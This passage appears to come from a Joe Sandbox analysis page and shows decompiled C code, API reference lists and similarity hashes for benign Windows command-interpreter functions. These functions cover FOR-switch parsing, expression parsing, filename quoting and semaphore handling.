										_t154 = _t154 + _t187;
										_t198 = _t198 + _t187;
										_t191 = _t191 + _t187;
									}
								}
								if((_t191 & 0xfffffffe) < 0x4000) {
									continue;
								}
								break;
							}
							 *_t154 = 0;
							_t154 = _v132;
							_t197 = _t154[0xa];
							_v156 = _t197;
							_t115 = calloc(4, _t197);
							 *0xdc853c = _t115;
							if(_t115 == 0) {
								goto L57;
							} else {
								_v140 = 0;
								_t191 = 0;
								_v132 = 0;
								if(_t197 > 0) {
									do {
										_t187 = ".";
										_t171 =  *((intOrPtr*)(_t154[0xe] + _t191 * 4)) + 0x30;
										_t122 = _t171;
										while(1) {
											_t197 =  *_t122;
											if(_t197 !=  *_t187) {
												break;
											}
											if(_t197 == 0) {
												L27:
												_t123 = 0;
											} else {
												_t197 =  *((intOrPtr*)(_t122 + 2));
												_t53 = _t187 + 2; // 0x200000
												if(_t197 !=  *_t53) {
													break;
												} else {
													_t122 = _t122 + 4;
													_t187 = _t187 + 4;
													if(_t197 != 0) {
														continue;
													} else {
														goto L27;
													}
												}
											}
											L29:
											if(_t123 != 0) {
												_t187 = L"..";
												_t124 = _t171;
												while(1) {
													_t199 =  *_t124;
													if(_t199 !=  *_t187) {
														break;
													}
													if(_t199 == 0) {
														L35:
														_t197 = 0;
														_t125 = 0;
													} else {
														_t204 =  *((intOrPtr*)(_t124 + 2));
														_t55 = _t187 + 2; // 0x2e
														if(_t204 !=  *_t55) {
															break;
														} else {
															_t124 = _t124 + 4;
															_t187 = _t187 + 4;
															if(_t204 != 0) {
																continue;
															} else {
																goto L35;
															}
														}
													}
													L37:
													if(_t125 != 0) {
														_t188 = _t171 + 2;
														do {
															_t126 =  *_t171;
															_t171 = _t171 + 2;
														} while (_t126 != _t197);
														_t197 = _v136;
														_t173 = _t171 - _t188 >> 1;
														_v152 = _t173;
														_t129 = calloc(_t197 + 4 + _t173, 2);
														_t187 =  *0xdc853c;
														 *(_t187 + _v140 * 4) = _t129;
														if(_t129 != 0) {
															_t177 = _v125;
															if(_t177 != 0) {
																_v144 = 0;
															} else {
																_t203 =  *((intOrPtr*)(_t154[0xe] + _t191 * 4)) + 0x30;
																_v144 = _t203;
																_t144 =  *_t203 & 0x0000ffff;
																if(_t144 != 0) {
																	_t180 = _t144;
																	do {
																		if(wcschr(L" &()[]{}^=;!%\'+,`~", _t180) != 0) {
																			_v125 = 1;
																		}
																		_t203 =  &(_t203[1]);
																		_t146 =  *_t203 & 0x0000ffff;
																		_t180 = _t146;
																	} while (_t146 != 0);
																	_t177 = _v125;
																	_t187 =  *0xdc853c;
																	_v144 = _t203;
																}
																_t197 = _v136;
															}
															_t192 =  *(_t187 + _v140 * 4);
															if(_t177 != 0) {
																_t142 = 0x22;
																 *_t192 = _t142;
																_t192 = _t192 + 2;
															}
															_t200 = _t197 + _t197;
															memcpy(_t192, _v148, _t200);
															_t193 = _t192 + _t200;
															_t197 = _v152 + _v152;
															memcpy(_t193,  *((intOrPtr*)(_t154[0xe] + _v132 * 4)) + 0x30, _t197);
															_t179 = _v125;
															_t206 = _t206 + 0x18;
															_t194 = _t193 + _t197;
															if(_t179 != 0) {
																_t138 = 0x22;
																 *_t194 = _t138;
																_t194 =  &(_t194[0]);
																_v125 = (_t138 & 0xffffff00 | _v144 != 0x00000000) - 0x00000001 & _t179;
															}
															_v140 = _v140 + 1;
															 *_t194 = 0;
															_t191 = _v132;
														}
													}
													goto L54;
												}
												asm("sbb eax, eax");
												_t125 = _t124 | 0x00000001;
												_t197 = 0;
												goto L37;
											}
											goto L54;
										}
										asm("sbb eax, eax");
										_t123 = _t122 | 0x00000001;
										goto L29;
										L54:
										_t191 = _t191 + 1;
										_v132 = _t191;
									} while (_t191 < _v156);
								}
								E00D90040(_t154[0xc]);
								E00D90040(_t154[2]);
								E00D90040(_t154);
								E00D95D39();
								_t105 = _v140;
							}
						}
					}
				}
				return E00D96FD0(_t105, _t154, _v8 ^ _t205, _t187, _t191, _t197);
			}

0x00daaef0
0x00daaef7
0x00daaefd
0x00daaeff
0x00daaf08
0x00daaf10
0x00daaf15
0x00daaf19
0x00daaf1c
0x00daaf1f
0x00daaf22
0x00daaf25
0x00daaf28
0x00daaf2b
0x00daaf2e
0x00daaf31
0x00daaf34
0x00daaf37
0x00daaf3a
0x00daaf3d
0x00daaf43
0x00daaf44
0x00daaf45
0x00daaf46
0x00daaf4a
0x00daaf50
0x00daaf53
0x00daaf56
0x00daaf59
0x00daaf5c
0x00daaf5f
0x00daaf62
0x00daaf63
0x00daaf64
0x00daaf65
0x00daaf6c
0x00daaf72
0x00daaf76
0x00daaf78
0x00daaf84
0x00daaf84
0x00daaf8d
0x00daaf92
0x00daaf9b
0x00daaf9d
0x00daafa0
0x00daafa5
0x00daafaa
0x00dab2a5
0x00dab2a5
0x00dab2aa
0x00daafbe
0x00daafc1
0x00daafd1
0x00000000
0x00daafd7
0x00daafd9
0x00daafe3
0x00daafe8
0x00daafef
0x00000000
0x00daaff5
0x00daaff8
0x00dab007
0x00dab00d
0x00dab00d
0x00dab012
0x00dab015
0x00dab019
0x00dab01c
0x00dab01e
0x00dab01f
0x00dab01f
0x00dab025
0x00000000
0x00000000
0x00dab02a
0x00dab066
0x00dab068
0x00dab068
0x00dab071
0x00dab074
0x00dab077
0x00000000
0x00dab02c
0x00dab02c
0x00dab032
0x00dab036
0x00dab03c
0x00dab040
0x00dab043
0x00dab043
0x00dab04b
0x00dab04f
0x00dab051
0x00dab078
0x00dab078
0x00dab07a
0x00dab07c
0x00dab07c
0x00dab04f
0x00dab088
0x00000000
0x00000000
0x00000000
0x00dab088
0x00dab08c
0x00dab08f
0x00dab092
0x00dab098
0x00dab09e
0x00dab0a4
0x00dab0ad
0x00000000
0x00dab0b3
0x00dab0b5
0x00dab0bb
0x00dab0bd
0x00dab0c2
0x00dab0c8
0x00dab0cb
0x00dab0d3
0x00dab0d6
0x00dab0d8
0x00dab0d8
0x00dab0de
0x00000000
0x00000000
0x00dab0e3
0x00dab0fa
0x00dab0fa
0x00dab0e5
0x00dab0e5
0x00dab0e9
0x00dab0ed
0x00000000
0x00dab0ef
0x00dab0ef
0x00dab0f2
0x00dab0f8
0x00000000
0x00000000
0x00000000
0x00000000
0x00dab0f8
0x00dab0ed
0x00dab103
0x00dab105
0x00dab10b
0x00dab110
0x00dab112
0x00dab112
0x00dab118
0x00000000
0x00000000
0x00dab11d
0x00dab134
0x00dab134
0x00dab136
0x00dab11f
0x00dab11f
0x00dab123
0x00dab127
0x00000000
0x00dab129
0x00dab129
0x00dab12c
0x00dab132
0x00000000
0x00000000
0x00000000
0x00000000
0x00dab132
0x00dab127
0x00dab141
0x00dab143
0x00dab149
0x00dab14c
0x00dab14c
0x00dab14f
0x00dab152
0x00dab157
0x00dab15f
0x00dab163
0x00dab16f
0x00dab175
0x00dab183
0x00dab188
0x00dab18e
0x00dab193
0x00dab29a
0x00dab199
0x00dab19f
0x00dab1a2
0x00dab1a8
0x00dab1ae
0x00dab1b0
0x00dab1b2
0x00dab1c2
0x00dab1c4
0x00dab1c4
0x00dab1c8
0x00dab1cb
0x00dab1ce
0x00dab1d0
0x00dab1d5
0x00dab1d8
0x00dab1de
0x00dab1de
0x00dab1e4
0x00dab1e4
0x00dab1f0
0x00dab1f5
0x00dab1f9
0x00dab1fa
0x00dab1fd
0x00dab1fd
0x00dab200
0x00dab20a
0x00dab218
0x00dab220
0x00dab22b
0x00dab230
0x00dab233
0x00dab236
0x00dab23a
0x00dab23e
0x00dab23f
0x00dab242
0x00dab253
0x00dab253
0x00dab258
0x00dab25e
0x00dab261
0x00dab261
0x00dab188
0x00000000
0x00dab143
0x00dab13a
0x00dab13c
0x00dab13f
0x00000000
0x00dab13f
0x00000000
0x00dab105
0x00dab0fe
0x00dab100
0x00000000
0x00dab264
0x00dab264
0x00dab265
0x00dab268
0x00dab0c8
0x00dab277
0x00dab27f
0x00dab286
0x00dab28b
0x00dab290
0x00dab290
0x00dab0ad
0x00daafef
0x00daafd1
0x00dab2bc

APIs

Part of subcall function 00DAB4DD: free.MSVCRT(?,0000000A,00000000,?,00DA35C4), ref: 00DAB4FB
Part of subcall function 00DAB4DD: free.MSVCRT(?,0000000A,00000000,?,00DA35C4), ref: 00DAB508

Part of subcall function 00D900B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000), ref: 00D900C1
Part of subcall function 00D900B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000,?), ref: 00D900C8

longjmp.MSVCRT(00DBB8B8,00000001,00000000,?,00000000), ref: 00DAAF84
qsort.MSVCRT ref: 00DAB007
wcschr.MSVCRT ref: 00DAB05C
calloc.MSVCRT ref: 00DAB09E
calloc.MSVCRT ref: 00DAB16F
wcschr.MSVCRT ref: 00DAB1B8
memcpy.MSVCRT ref: 00DAB20A
memcpy.MSVCRT ref: 00DAB22B

Strings

&()[]{}^=;!%'+,`~, xrefs: 00DAB057, 00DAB1B3

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Heapcallocfreememcpywcschr$AllocProcesslongjmpqsort
String ID: &()[]{}^=;!%'+,`~
API String ID: 975110957-381716982
Opcode ID: 3f58cf2e8aaa3cbd5e4560ddef09fa9c1d03028f6e9a97f8bde6495eee78e383
Instruction ID: 561d5e7646ffcca9827872a6e6a8557494b60de253093fd5887cd4f3b0f9ea7c
Opcode Fuzzy Hash: 3f58cf2e8aaa3cbd5e4560ddef09fa9c1d03028f6e9a97f8bde6495eee78e383
Instruction Fuzzy Hash: A4C19576A042159BDF249F68DC517AEBBB1EF46720F14406EE848E7342EB309D46CB78

Uniqueness

Uniqueness Score: -1.00%

Function 00D89A26, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 212
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00D89A26(void* __eax) {
				void* __edi;
				intOrPtr _t31;
				signed short _t32;
				intOrPtr _t36;
				intOrPtr _t44;
				int _t47;
				intOrPtr _t52;
				void* _t60;
				void* _t70;
				void* _t79;
				void* _t80;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t91;
				void* _t94;
				signed int _t96;
				intOrPtr* _t101;

				_t96 = 0;
				__imp___wcsicmp(L"FOR/?", 0xdbfaa0);
				_t102 = __eax;
				if(__eax == 0) {
					 *0xdbfaa6 = 0;
					_t96 = 1;
				}
				_t63 = 0x2b;
				 *0xdbfa8c = 0x1e;
				_t101 = E00D8E9A0(_t63, _t102);
				_t31 = 0x2f;
				if(_t96 != 0) {
					 *0xdbfaa0 = _t31;
					_t32 = 0x3f;
					 *0xdbfaa2 = _t32;
					 *0xdbfaa4 = 0;
				} else {
					_t63 = 0;
					E00D8F030(0);
				}
				_t88 = 0x2b;
				if(E00D8DCE1(_t60, _t88, _t96) != 0) {
					 *(_t101 + 0x38) =  *(_t101 + 0x38) & 0x00000000;
					 *_t101 = 0x3c;
					goto L18;
				} else {
					 *(_t101 + 0x48) =  *(_t101 + 0x48) & 0x00000000;
					_t36 = 0x25;
					if( *0xdc3cc9 == 0) {
						L13:
						if( *0xdbfaa0 != _t36) {
							L45:
							E00DA82EB(_t63);
							L17:
							_push(0xdbfaa0);
							_push( *(_t101 + 0x38));
							_t89 = 0x1e;
							E00D89C73( *(_t101 + 0x38), _t89);
							E00D89C4D(L"IN");
							_push(0xdbfaa0);
							_push( *(_t101 + 0x38));
							_t90 = 0x1e;
							E00D89C73( *(_t101 + 0x38), _t90);
							 *((intOrPtr*)(_t101 + 0x3c)) = E00D89936(_t60);
							E00D89C4D(L"DO");
							_push(0xdbfaa0);
							_t91 = 8;
							E00D91040( *(_t101 + 0x38) + 0x2c, _t91);
							_t70 = 0x2b;
							_t44 = E00D8DC74(_t60, _t70);
							 *((intOrPtr*)(_t101 + 0x40)) = _t44;
							if(_t44 == 0) {
								E00DA82EB(_t70);
							}
							L18:
							return _t101;
						}
						_t47 = iswspace( *0xdbfaa2 & 0x0000ffff);
						_pop(_t63);
						if(_t47 != 0) {
							goto L45;
						}
						_t63 = L"=,;";
						 *(_t101 + 0x44) =  *0xdbfaa2 & 0x0000ffff;
						if(E00D8D7D4(L"=,;",  *0xdbfaa2 & 0x0000ffff) != 0 ||  *0xdbfa8c != 3) {
							goto L45;
						} else {
							goto L17;
						}
					} else {
						while(1) {
							__imp___wcsicmp(L"/L", 0xdbfaa0);
							if(_t36 == 0) {
								goto L30;
							}
							L7:
							__imp___wcsicmp(L"/D", 0xdbfaa0);
							if(_t36 == 0) {
								 *(_t101 + 0x48) =  *(_t101 + 0x48) | 0x00000002;
								L25:
								_t36 = E00D8F030(0);
								while(1) {
									__imp___wcsicmp(L"/L", 0xdbfaa0);
									if(_t36 == 0) {
										goto L30;
									}
									goto L7;
								}
								goto L30;
							}
							__imp___wcsicmp(L"/F", 0xdbfaa0);
							if(_t36 == 0) {
								 *(_t101 + 0x48) =  *(_t101 + 0x48) | 0x00000008;
								E00D8F030(0);
								_t36 =  *0xdbfaa0;
								_t79 = 0x25;
								__eflags = _t36 - _t79;
								if(_t36 == _t79) {
									continue;
								}
								_t80 = 0x2f;
								__eflags = _t36 - _t80;
								if(_t36 == _t80) {
									continue;
								}
								__eflags =  *((intOrPtr*)(_t101 + 0x4c));
								if( *((intOrPtr*)(_t101 + 0x4c)) != 0) {
									E00DA82EB(_t80);
								}
								_t63 = 6 +  *0xdbfa8c * 2;
								_t52 = E00D900B0(_t63);
								__eflags = _t52;
								if(_t52 == 0) {
									L41:
									E00DA9287(_t63);
									__imp__longjmp(0xdbb8b8, 1);
									L42:
									__eflags = _t63 - 6;
									if(_t63 != 6) {
										__eflags = _t63 - 4;
										if(_t63 != 4) {
											E00DA82EB(_t63);
										}
									}
									L12:
									_t36 = 0x25;
									goto L13;
								} else {
									_t94 =  *0xdbfa8c + 3;
									L24:
									 *((intOrPtr*)(_t101 + 0x4c)) = _t52;
									E00D91040(_t52, _t94, 0xdbfaa0);
									goto L25;
								}
							}
							__imp___wcsicmp(L"/R", 0xdbfaa0);
							_t63 =  *(_t101 + 0x48);
							if(_t36 == 0) {
								 *(_t101 + 0x48) = _t63 | 0x00000004;
								E00D8F030(0);
								__eflags =  *((intOrPtr*)(_t101 + 0x4c));
								if( *((intOrPtr*)(_t101 + 0x4c)) != 0) {
									E00DA82EB(0);
								}
								_t36 =  *0xdbfaa0;
								_t86 = 0x25;
								__eflags = _t36 - _t86;
								if(_t36 == _t86) {
									continue;
								} else {
									_t87 = 0x2f;
									__eflags = _t36 - _t87;
									if(_t36 == _t87) {
										continue;
									}
									_t63 = 2 +  *0xdbfa8c * 2;
									_t52 = E00D900B0(_t63);
									__eflags = _t52;
									if(_t52 == 0) {
										goto L41;
									}
									_t94 =  *0xdbfa8c + 1;
									goto L24;
								}
							}
							if(_t63 == 0 || _t63 == 8) {
								goto L12;
							} else {
								__eflags = _t63 - 2;
								if(_t63 == 2) {
									goto L12;
								}
								__eflags = _t63 - 1;
								if(_t63 == 1) {
									goto L12;
								}
								goto L42;
							}
							L30:
							 *(_t101 + 0x48) =  *(_t101 + 0x48) | 1;
							goto L25;
						}
					}
				}
			}

0x00d89a34
0x00d89a36
0x00d89a3e
0x00d89a40
0x00da1097
0x00da109d
0x00da109d
0x00d89a48
0x00d89a49
0x00d89a58
0x00d89a5c
0x00d89a5f
0x00da10a3
0x00da10ab
0x00da10ac
0x00da10b4
0x00d89a65
0x00d89a65
0x00d89a67
0x00d89a67
0x00d89a6e
0x00d89a76
0x00da10bf
0x00da10c3
0x00000000
0x00d89a7c
0x00d89a7c
0x00d89a89
0x00d89a8a
0x00d89b0a
0x00d89b11
0x00da1154
0x00da1154
0x00d89b57
0x00d89b5f
0x00d89b60
0x00d89b63
0x00d89b64
0x00d89b6e
0x00d89b76
0x00d89b77
0x00d89b7a
0x00d89b7b
0x00d89b8a
0x00d89b8d
0x00d89b95
0x00d89b9b
0x00d89b9c
0x00d89ba3
0x00d89ba4
0x00d89ba9
0x00d89bae
0x00da115e
0x00da115e
0x00d89bb5
0x00d89bb8
0x00d89bb8
0x00d89b1f
0x00d89b25
0x00d89b28
0x00000000
0x00000000
0x00d89b35
0x00d89b3a
0x00d89b44
0x00000000
0x00000000
0x00000000
0x00000000
0x00d89a8c
0x00d89a8f
0x00d89a99
0x00d89aa3
0x00000000
0x00000000
0x00d89aa9
0x00d89ab3
0x00d89abd
0x00d89c3b
0x00d89c19
0x00d89c1b
0x00d89a8f
0x00d89a99
0x00d89aa3
0x00000000
0x00000000
0x00000000
0x00d89aa3
0x00000000
0x00d89a8f
0x00d89acd
0x00d89ad7
0x00d89bb9
0x00d89bbf
0x00d89bc4
0x00d89bcc
0x00d89bcd
0x00d89bd0
0x00000000
0x00000000
0x00d89bd8
0x00d89bd9
0x00d89bdc
0x00000000
0x00000000
0x00d89be2
0x00d89be6
0x00d89c46
0x00d89c46
0x00d89bed
0x00d89bf4
0x00d89bf9
0x00d89bfb
0x00da1127
0x00da1127
0x00da1132
0x00da1138
0x00da1138
0x00da113b
0x00da1141
0x00da1144
0x00da114a
0x00da114a
0x00da1144
0x00d89b07
0x00d89b09
0x00000000
0x00d89c01
0x00d89c07
0x00d89c0a
0x00d89c11
0x00d89c14
0x00000000
0x00d89c14
0x00d89bfb
0x00d89ae7
0x00d89aef
0x00d89af4
0x00da10d1
0x00da10d6
0x00da10db
0x00da10df
0x00da10e1
0x00da10e1
0x00da10e6
0x00da10ee
0x00da10ef
0x00da10f2
0x00000000
0x00da10f8
0x00da10fa
0x00da10fb
0x00da10fe
0x00000000
0x00000000
0x00da1109
0x00da1110
0x00da1115
0x00da1117
0x00000000
0x00000000
0x00da111f
0x00000000
0x00da111f
0x00da10f2
0x00d89afc
0x00000000
0x00d89c25
0x00d89c25
0x00d89c28
0x00000000
0x00000000
0x00d89c2e
0x00d89c30
0x00000000
0x00000000
0x00000000
0x00d89c36
0x00d89c41
0x00d89c41
0x00000000
0x00d89c41
0x00d89a8f
0x00d89a8a

APIs

_wcsicmp.MSVCRT ref: 00D89A36
_wcsicmp.MSVCRT ref: 00D89A99
_wcsicmp.MSVCRT ref: 00D89AB3
_wcsicmp.MSVCRT ref: 00D89ACD
_wcsicmp.MSVCRT ref: 00D89AE7
iswspace.MSVCRT ref: 00D89B1F

Strings

=,;, xrefs: 00D89B35
FOR/?, xrefs: 00D89A2F

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: _wcsicmp$iswspace
String ID: =,;$FOR/?
API String ID: 759518647-2121398454
Opcode ID: 1b1ff2112ee79f0d2c0e8ab4902f158fec9fb34ababba975168142604ab70fe8
Instruction ID: 580625b03c96fda9bc74ba47725308b96a3aadcedaab427954b580483e8f1970
Opcode Fuzzy Hash: 1b1ff2112ee79f0d2c0e8ab4902f158fec9fb34ababba975168142604ab70fe8
Instruction Fuzzy Hash: CD61D735200742CEDB38B735AC6AB76B2A0EF81710F18442EE587D6AD1EA71D845C735

Uniqueness

Uniqueness Score: -1.00%

Function 00D864DC, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E00D864DC(void* __eflags, intOrPtr _a4, wchar_t* _a8, long _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v28;
				signed short* _t39;
				short* _t45;
				int _t50;
				wchar_t* _t54;
				long _t55;
				long _t62;
				signed int _t71;

				E00D89794( &_a8);
				_t39 = _a8;
				_t62 =  *_t39 & 0x0000ffff;
				if(_t62 == 0) {
					L22:
					_a16 = 0x400023cd;
					L9:
					L10:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					return _a4;
				}
				if(_t62 == 0x28) {
					_a8 =  &(_t39[1]);
					_push( &_v28);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E00D86355();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					__eflags = _a16;
					if(_a16 != 0) {
						L21:
						goto L10;
					}
					E00D89794( &_a8);
					_t45 = _a8;
					__eflags =  *_t45 - 0x29;
					if( *_t45 != 0x29) {
						_a16 = 0x400023cc;
					} else {
						_a8 = _t45 + 2;
					}
					goto L9;
				}
				if(wcschr(L"+-~!", _t62) != 0) {
					_a8 =  &(_a8[0]);
					_push( &_v28);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E00D864DC(__eflags);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					__eflags = _a16;
					if(_a16 != 0) {
						goto L21;
					}
					E00D84409( &_a8, _t62, _a12);
					goto L9;
				}
				_t50 = iswdigit(_t62);
				if(_t50 == 0) {
					__eflags = E00D86785( &_a8,  &_v12, __eflags,  &_v8);
					if(__eflags == 0) {
						goto L22;
					} else {
						_a12 = E00D860DE(_v8, __eflags);
						goto L9;
					}
				}
				__imp___errno();
				 *_t50 = 0;
				_t54 = _a8;
				if( *_t54 == 0x30) {
					_t71 = _t54[0] & 0x0000ffff;
					__eflags = _t71 - 0x78;
					if(_t71 == 0x78) {
						L24:
						_t55 = wcstoul(_t54,  &_a8, 0);
						L6:
						_a12 = _t55;
						if(_t55 == 0x7fffffff) {
							__imp___errno();
							__eflags =  *_t55 - 0x22;
							if( *_t55 != 0x22) {
								goto L7;
							}
							_a16 = 0x400023d0;
							goto L9;
						}
						L7:
						if(iswdigit( *_a8 & 0x0000ffff) != 0 || iswalpha( *_a8 & 0x0000ffff) != 0) {
							_a16 = 0x400023cf;
						}
						goto L9;
					}
					__eflags = _t71 - 0x58;
					if(_t71 != 0x58) {
						goto L5;
					}
					goto L24;
				}
				L5:
				_t55 = wcstol(_t54,  &_a8, 0);
				goto L6;
			}

0x00d864ea
0x00d864ef
0x00d864f2
0x00d864f8
0x00d9ac90
0x00d9ac90
0x00d86589
0x00d8658c
0x00d86591
0x00d86592
0x00d86593
0x00d8659a
0x00d8659a
0x00d86501
0x00d865cf
0x00d865d5
0x00d865d6
0x00d865d7
0x00d865d8
0x00d865d9
0x00d865e3
0x00d865e4
0x00d865e5
0x00d865e6
0x00d865ea
0x00d8665c
0x00000000
0x00d8665c
0x00d865ef
0x00d865f4
0x00d865f7
0x00d865fb
0x00d9ac9c
0x00d86601
0x00d86604
0x00d86604
0x00000000
0x00d865fb
0x00d86517
0x00d86624
0x00d86633
0x00d86634
0x00d86635
0x00d86636
0x00d86637
0x00d86641
0x00d86642
0x00d86643
0x00d86644
0x00d86648
0x00000000
0x00000000
0x00d86652
0x00000000
0x00d86652
0x00d8651e
0x00d86527
0x00d865ac
0x00d865ae
0x00000000
0x00d865b4
0x00d865bf
0x00000000
0x00d865bf
0x00d865ae
0x00d86529
0x00d86531
0x00d86533
0x00d8653a
0x00d86609
0x00d8660d
0x00d86610
0x00d9aca8
0x00d9acae
0x00d8654c
0x00d8654f
0x00d86557
0x00d9acb9
0x00d9acbf
0x00d9acc2
0x00000000
0x00000000
0x00d9acc8
0x00000000
0x00d9acc8
0x00d8655d
0x00d8656d
0x00d9acd4
0x00d9acd4
0x00000000
0x00d8656d
0x00d86616
0x00d86619
0x00000000
0x00000000
0x00000000
0x00d8661f
0x00d86540
0x00d86546
0x00000000

APIs

wcschr.MSVCRT ref: 00D8650D
iswdigit.MSVCRT ref: 00D8651E
_errno.MSVCRT ref: 00D86529
wcstol.MSVCRT ref: 00D86546
iswdigit.MSVCRT ref: 00D86564
iswalpha.MSVCRT ref: 00D8657A
wcstoul.MSVCRT ref: 00D9ACAE
_errno.MSVCRT ref: 00D9ACB9

Strings

+-~!, xrefs: 00D86508

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
String ID: +-~!
API String ID: 2191331888-2604099254
Opcode ID: 77010817d24fafb2a44d8040125255884942bec44914c34fb4ff735396d6d38d
Instruction ID: 6581583d6e3fc434340d1aeb8f2af004469f22197713628b75e9bfe0a52fff27
Opcode Fuzzy Hash: 77010817d24fafb2a44d8040125255884942bec44914c34fb4ff735396d6d38d
Instruction Fuzzy Hash: 8E518D7640020AEBCF11EF69E8499AB77A4EF45330F14815AFC169B290EB74DA04CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00DA213A, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00DA213A(void* __ecx, intOrPtr* __edx) {
				void* _v0;
				long _v8;
				long _v12;
				long _t11;
				void* _t16;
				long _t18;
				intOrPtr* _t41;
				void* _t44;

				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_t41 = __edx;
				_t11 = WaitForSingleObject(__ecx, 0);
				if(_t11 != 0xffffffff) {
					if(_t11 == 0 || _t11 == 0x102) {
						_v8 = 0;
						if(_t11 != 0) {
							_v12 = 0;
							if(ReleaseSemaphore(_t44, 1,  &_v12) != 0) {
								if(_v12 == 0) {
									if(ReleaseSemaphore(_t44, 1, 0) != 0 || GetLastError() != 0x12a) {
										goto L24;
									} else {
										_t18 = WaitForSingleObject(_t44, 0);
										if(_t18 != 0xffffffff) {
											if(_t18 == 0) {
												goto L22;
											} else {
												goto L24;
											}
										} else {
											goto L2;
										}
									}
								} else {
									goto L24;
								}
							} else {
								goto L2;
							}
						} else {
							if(ReleaseSemaphore(_t44, 1,  &_v8) != 0) {
								_v8 = _v8 + 1;
								if(ReleaseSemaphore(_t44, 1, 0) != 0 || GetLastError() != 0x12a) {
									goto L24;
								} else {
									L22:
									 *_t41 = _v8;
									_t16 = 0;
								}
							} else {
								goto L2;
							}
						}
					} else {
						L24:
						E00DA292C("wil", 0x8000ffff);
						_t16 = 0x8000ffff;
					}
				} else {
					L2:
					_t16 = E00DA2913("wil");
				}
				return _t16;
			}

0x00da213f
0x00da2140
0x00da2146
0x00da214a
0x00da214c
0x00da2155
0x00da2170
0x00da2183
0x00da2188
0x00da21ca
0x00da21d9
0x00da21e8
0x00da21fd
0x00000000
0x00da220c
0x00da220e
0x00da2217
0x00da2225
0x00000000
0x00da2227
0x00000000
0x00da2227
0x00da2219
0x00000000
0x00da2219
0x00da2217
0x00da21ea
0x00000000
0x00da21ea
0x00da21db
0x00000000
0x00da21db
0x00da218a
0x00da2199
0x00da21a2
0x00da21b1
0x00000000
0x00da222e
0x00da222e
0x00da2231
0x00da2233
0x00da2233
0x00da219b
0x00000000
0x00da219b
0x00da2199
0x00da2179
0x00da223c
0x00da224a
0x00da224f
0x00da224f
0x00da2157
0x00da215c
0x00da2164
0x00da2164
0x00da2257

APIs

WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,?,00000000,?,00000000,00000000,?,00DA2CF5), ref: 00DA214C

Strings

wil, xrefs: 00DA215F, 00DA2245

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: ObjectSingleWait
String ID: wil
API String ID: 24740636-1589926490
Opcode ID: a7ee0d0d8238ef7c7bde0dc50d65df44376d71ffc97dbaa10d7cd31df98814f3
Instruction ID: c7dbde97a56e5909624446e7402e2d8e11c3c931b72af43d82c52bfeced70330
Opcode Fuzzy Hash: a7ee0d0d8238ef7c7bde0dc50d65df44376d71ffc97dbaa10d7cd31df98814f3
Instruction Fuzzy Hash: 9C318434700306BBEB205B6B9C88B7FB669DF83354F644135FA45D6280D675CE02977A

Uniqueness

Uniqueness Score: -1.00%

Function 00DA7C83, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 91
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00DA7C83(void* __ebx, intOrPtr __edx, intOrPtr _a4, long _a8, char _a16) {
				signed int _v12;
				char _v44;
				short _v112;
				short _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				void* __edi;
				void* __esi;
				signed int _t24;
				long _t29;
				void* _t33;
				signed int _t38;
				char* _t43;
				long _t46;
				void* _t47;
				intOrPtr _t59;
				signed int _t60;

				_t56 = __edx;
				_t47 = __ebx;
				_t24 =  *0xdad0b4; // 0x35c4fbb8
				_v12 = _t24 ^ _t60;
				_t59 = _a4;
				_v120 =  &_a16;
				_v116 = 0;
				_t29 = FormatMessageW(0x1900, 0, _a8, 0,  &_v116, 0xa,  &_v120);
				_v120 = 0;
